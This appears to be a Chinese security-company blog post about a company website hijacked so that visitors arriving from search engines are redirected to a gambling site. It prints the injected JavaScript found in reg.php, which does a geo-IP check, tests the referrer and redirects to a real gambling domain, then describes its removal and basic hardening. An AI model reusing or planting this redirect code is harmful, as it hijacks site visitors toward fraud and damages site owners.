Sine安全-网络安全背后的巨人,提供服务器安全_服务器维护_网站安全解决方案

网站被黑,从百度点进去跳转到博彩网站

         
          最近公司网站莫名的访问量减少,网站在百度搜索里排名也都下滑到第二页去了
 
,也不知道怎么回事搞得最近很烦,领导也找我谈话,问网站怎么管理维护的,一直稳
 
定了好几年的网站排名,怎么最近都跌倒后头去了,我说可能最近百度做调整吧,很快
 
排名会上来的,本来也没有太在意,因为之前遇到过百度抽风的这些情况。
 
 
 
最近也加上客户订单越来越少,领导也是着急,很大一部分客户渠道来源都从百度点击
 
来的,静下心来看看网站到底是怎么回事,不看不要紧,简直吓我一跳。Sine安全公司
 
是一家专注于:服务器安全、网站安全、网站漏洞检测、网站安全测试、渗透测试服务
 
一体的网络安全服务提供商。
 
 
网站在百度里的收录增加许多,本来以为是更新的文章导致的,可是仔细一想也没那么
 
多的收录呀,site:网站,点击到十页以后竟然发现了问题的关键,百度收录了一大堆我
 
们网站没有的URL链接,复制那个我们域名的链接,提示不存在,从百度收录点进去跳转
 
到博彩网站。

 
360提示:未经证实的博彩赌博网站
 
您访问的网站含有未经证实的境外博彩或非法赌博的相关内容,可能给您造成财产损失,
 
请您谨慎访问。
 
如下图所示:
 



 
我这才明白过来,原来是我网站被黑了。
 
赶紧连网站的FTP,下载网站程序代码到本地,然后挨个对每一个代码进行查看,查看是
 
不是网站被黑客植入了木马后门,果不其然在会员系统里的注册页面reg.php发现了黑客
 
插入的恶意代码:
 
document.write ('<script language="javascript" type="text/javascript" 
 
src="//js.users.51.la/19197547.js"></script>');
var jump_head = document.getElementsByTagName('head')[0];
var jump_script= document.createElement('script');
jump_script.type= 'text/javascript'; 
jump_script.src= 'http://int.dpool.sina.com.cn/iplookup/iplookup.php?
 
format=js'; 
jump_head.appendChild(jump_script);
var jump_myt = setInterval(function(){
if (remote_ip_info) {
clearInterval(jump_myt);
if (remote_ip_info.city == '\u798f\u5efa' ||  
 
remote_ip_info.province == '\u798f\u5efa') {
 
}else{
   go_bots_url();
}
}
},500);
function go_bots_url(){
var init_flag = "93989",
bct = document.referrer,
bot = ['baidu', 'google', 'yahoo', 'bing', 'soso', 'sogou', 
 
'360.cn', 'so.com', 'youdao', 'anquan','sm.cn'];//, 'haosou'];
for (var i in bot) {
if (bct.indexOf(bot[i]) != -1) {
init_flag = "1245";
document.writeln("<script language=
 
\"javascript\">window.location=\"http://www.889vv.net/?Intr=36710998\";<
 
\/script>")
}
}
if(init_flag == "93989"){
call_init_error();
}
}
 
随即我就以www.889vv.net为特征码进行搜索,在data目录下数据库文件里发现了被插
 
入了同样的恶意代码,然后手动删除了这两个代码,网站被跳转到博彩网站问题解决了
 
,从百度来的点击,网站也没有再跳转到博彩网站上去。通过这一次经历,彻彻底底的
 
明白了网站安全的重要性,不管是做优化,还是维护网站的,都要时刻注意网站安全,
 
习近平主席说过,没有网络安全,就没有国家安全,安全还是要重视起来,这一次安全
 
事故,也给我们公司上了一课,2个月的时间流失了多少客户,少了多少订单,损失惨重
 
 
接下来,还有百度的博彩快照的清除,一个一个投诉到百度站长中心,等待百度的快照
 
更新,慢慢的再增加原创文章,加点外链,把网站百度权重提高上去。本身网站有七八
 
年的时间了,在百度也算老站了,应该也会很快的恢复网站排名。
 
 
 
对于新手在网站安全方面,如何加固网站安全,我大体说一下,很多不懂网站安全的可能
 
会很迷糊,那我写下来,希望能帮到更多像我一样情况的网站管理员。
 
网站被挂马,通常就是黑客利用网站程序或者是语言脚本解释漏洞上传一些可以直接对
 
站点文件进行修改脚本木马,然后通过web形式去访问那个脚本木马实现对当前的网站
 
文件进行修改,比如加入一段广告代码,通常是iframe或者script。
 
想知道网站是否被挂马,有个比较简单的方法,直接检查每个脚本文件最下方是否被加
 
入了iframe或者script的代码,然后这段代码是否是程序员设计时候添加的,程序员一
 
看就能够知道。
 
网站安全防范的方式也简单:
 
1、网站代码漏洞,这需要有安全意识的程序员才能修复得了,通常是出现被挂马以后才
 
   知道要针对哪方面入手修复;
 
2、也可以通过网站安全公司来解决,国内也就Sinesafe和绿盟等安全公司比较专业.
 
3. 服务器目录权限的“读”、“写”、“执行”,“是否允许脚本”,等,使用经营已
 
   久的虚拟空间提供商的空间,可以有效降低被挂马的几率。
分享: